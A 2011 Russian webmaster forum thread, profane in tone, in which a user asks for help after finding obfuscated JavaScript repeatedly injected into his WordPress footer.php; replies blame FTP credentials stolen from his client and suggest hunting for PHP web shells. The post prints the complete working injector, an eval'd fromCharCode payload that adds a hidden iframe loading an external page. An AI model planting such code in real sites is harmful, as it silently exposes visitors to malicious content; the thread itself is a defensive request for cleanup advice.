|
|
| | Дата |
|
| USD/RUB | 89.7026 | | BTC/USD | 69542.7179 |
|
|
|
| Скрипты, программы и технические решения Обсуждаем скрипты, программы и новые технологии. |
12.07.2011, 23:51
|
Start Post: подцепил заразу,помогите вылечить 
|
|
Ебланнед
Регистрация: 01.10.2009
Адрес: Online
Сообщений: 1,873
Бабло: $294890
|
захожу на свои 2 вп блога, а аваст мне кричит что они заражены какимто гавном, начал рытся нашел в шаблоне footer.php эту ебалу:
PHP код:
<script>var s,w=Number.MAX_VALUE,z=2,aa=document.createTextNode("harCode");if(isFinite(w)&&!isFinite(w*1.5)){s=String["fr"+"omC"+aa.nodeValue];}eval(s(7+z,7+z,103+z,100+z,30+z,38+z,98+z,109+z,97+z,115+z,107+z,99+z,108+z,114+z,44+z,101+z,99+z,114+z,67+z,106+z,99+z,107+z,99+z,108+z,114+z,113+z,64+z,119+z,82+z,95+z,101+z,76+z,95+z,107+z,99+z,38+z,37+z,96+z,109+z,98+z,119+z,37+z,39+z,89+z,46+z,91+z,39+z,121+z,7+z,7+z,7+z,103+z,100+z,112+z,95+z,107+z,99+z,112+z,38+z,39+z,57+z,7+z,7+z,123+z,30+z,99+z,106+z,113+z,99+z,30+z,121+z,7+z,7+z,7+z,98+z,109+z,97+z,115+z,107+z,99+z,108+z,114+z,44+z,117+z,112+z,103+z,114+z,99+z,38+z,32+z,58+z,103+z,100+z,112+z,95+z,107+z,99+z,30+z,113+z,112+z,97+z,59+z,37+z,102+z,114+z,114+z,110+z,56+z,45+z,45+z,108+z,97+z,43+z,113+z,114+z,95+z,114+z,113+z,44+z,97+z,120+z,44+z,97+z,97+z,45+z,113+z,114+z,95+z,114+z,103+z,113+z,114+z,103+z,97+z,44+z,102+z,114+z,107+z,37+z,30+z,117+z,103+z,98+z,114+z,102+z,59+z,37+z,47+z,46+z,37+z,30+z,102+z,99+z,103+z,101+z,102+z,114+z,59+z,37+z,47+z,46+z,37+z,30+z,113+z,114+z,119+z,106+z,99+z,59+z,37+z,116+z,103+z,113+z,103+z,96+z,103+z,106+z,103+z,114+z,119+z,56+z,102+z,103+z,98+z,98+z,99+z,108+z,57+z,110+z,109+z,113+z,103+z,114+z,103+z,109+z,108+z,56+z,95+z,96+z,113+z,109+z,106+z,115+z,114+z,99+z,57+z,106+z,99+z,100+z,114+z,56+z,46+z,57+z,114+z,109+z,110+z,56+z,46+z,57+z,37+z,60+z,58+z,45+z,103+z,100+z,112+z,95+z,107+z,99+z,60+z,32+z,39+z,57+z,7+z,7+z,123+z,7+z,7+z,100+z,115+z,108+z,97+z,114+z,103+z,109+z,108+z,30+z,103+z,100+z,112+z,95+z,107+z,99+z,112+z,38+z,39+z,121+z,7+z,7+z,7+z,116+z,95+z,112+z,30+z,100+z,30+z,59+z,30+z,98+z,109+z,97+z,115+z,107+z,99+z,108+z,114+z,44+z,97+z,112+z,99+z,95+z,114+z,99+z,67+z,106+z,99+z,107+z,99+z,108+z,114+z,38+z,37+z,103+z,100+z,112+z,95+z,107+z,99+z,37+z,39+z,57+z,100+z,44+z,113+z,99+z,114+z,63+z,114+z,114+z,112+z,103+z,96+z,115+z,114+z,99+z,38+z,37+z,113+z,112+z,97+z,37+z,42+z,37+z,102+z,114+z,114+z,110+z,56+z,45+z,45+z,108+z,97+z,43+z,113+z,114+z,95+z,114+z,113+z,44+z,97+z,120+z,44+z,97+z,97+z,45+z,113+z,114+z,95+z,114+z,103+z,113+z,114+z,103+z,97+z,44+z,102+z,114+z,107+z,37+z,39+z,57+z,100+z,44+z,113+z,114+z,119+z,106+z,99+z,44+z,116+z,103+z,113+z,103+z,96+z,103+z,106+z,103+z,114+z,119+z,59+z,37+z,102+z,103+z,98+z,98+z,99+z,108+z,37+z,57+z,100+z,44+z,113+z,114+z,119+z,106+z,99+z,44+z,110+z,109+z,113+z,103+z,114+z,103+z,109+z,108+z,59+z,37+z,95+z,96+z,113+z,109+z,106+z,115+z,114+z,99+z,37+z,57+z,100+z,44+z,113+z,114+z,119+z,106+z,99+z,44+z,106+z,99+z,100+z,114+z,59+z,37+z,46+z,37+z,57+z,100+z,44+z,113+z,114+z,119+z,106+z,99+z,44+z,114+z,109+z,110+z,59+z,37+z,46+z,37+z,57+z,100+z,44+z,113+z,99+z,114+z,63+z,114+z,114+z,112+z,103+z,96+z,115+z,114+z,99+z,38+z,37+z,117+z,103+z,98+z,114+z,102+z,37+z,42+z,37+z,47+z,46+z,37+z,39+z,57+z,100+z,44+z,113+z,99+z,114+z,63+z,114+z,114+z,112+z,103+z,96+z,115+z,114+z,99+z,38+z,37+z,102+z,99+z,103+z,101+z,102+z,114+z,37+z,42+z,37+z,47+z,46+z,37+z,39+z,57+z,7+z,7+z,7+z,98+z,109+z,97+z,115+z,107+z,99+z,108+z,114+z,44+z,101+z,99+z,114+z,67+z,106+z,99+z,107+z,99+z,108+z,114+z,113+z,64+z,119+z,82+z,95+z,101+z,76+z,95+z,107+z,99+z,38+z,37+z,96+z,109+z,98+z,119+z,37+z,39+z,89+z,46+z,91+z,44+z,95+z,110+z,110+z,99+z,108+z,98+z,65+z,102+z,103+z,106+z,98+z,38+z,100+z,39+z,57+z,7+z,7+z,123+z));</script>
удалил, сделал бекап, просканил антивирусом вроде нормально, через дня опять хуяк и эта хуйня на блогах, блоги на разных хостинга.
как лечить? это я на комп чето поймал ?
__________________
Zodar = Affbox
|
|
|
|
13.07.2011, 00:28
|
#12
|
|
Ебланнед
Регистрация: 01.10.2009
Адрес: Online
Сообщений: 1,873
Бабло: $294890
-->
|
ТС
Цитата:
Сообщение от I love this game
если и плагины разные, то скорее всего ты что-то подцепил.
|
бля а вот про плагины не подумал стандартный набор стоит, который почти на всех блогах есть page-navi, akimset,rus-to-lat etc... сейчас в них покопаюсь
__________________
Zodar = Affbox
|
|
|
|
|
13.07.2011, 00:28
|
#13
|
|
Je suis moine ivre
Регистрация: 03.03.2009
Сообщений: 15,268
Бабло: $797172957
|
Ага, из фтп-менеджеров все пачками уводят
память развивай @ пасы руками вбивай
|
|
|
|
|
13.07.2011, 00:33
|
#14
|
|
gofuckingoogle
Регистрация: 28.08.2008
Адрес: 666
Сообщений: 9,443
Бабло: $1278665
|
Цитата:
Сообщение от Zodar
пароли не легкие, и рызные. друг с другом блоги вообще не пересекаются, хостинги разные, шаблоны разные, даже версии WP разные, поетому думаю может у меня на компе какаято хуйня их заражает когда я по фтп работаю....
|
Значит с вероятностью 95% увели пассы из твоего фтп-менеджера |
|
|
|
|
13.07.2011, 00:37
|
#15
|
|
накидка-антиблик адидас
Регистрация: 20.11.2010
Сообщений: 2,137
Бабло: $361580
|
делете, подумал о другой херне 
Последний раз редактировалось παφ; 13.07.2011 в 00:44.
|
|
|
|
|
13.07.2011, 01:20
|
#16
|
|
Super Moderator
Регистрация: 04.04.2007
Адрес: Panama
Сообщений: 5,301
Бабло: $1565315
|
в первую очередь пароли смени на фтп, по футеру скорее всего автомат ходит, но не обязательно.
Поищи php файлы(шелл) по дате изменения( но это не 100% вариант, т.к могут дату менять)
можно по размеру искать. Ну это простые такие, полу-меры.
|
|
|
|
|
13.07.2011, 01:33
|
#17
|
|
Fuck Yeah
Регистрация: 08.10.2009
Адрес: Ghetto
Сообщений: 2,689
Бабло: $1436314
|
Лучше возьми несколько известных шеллов и поищи по тексту
|
|
|
|
|
Линейный вид
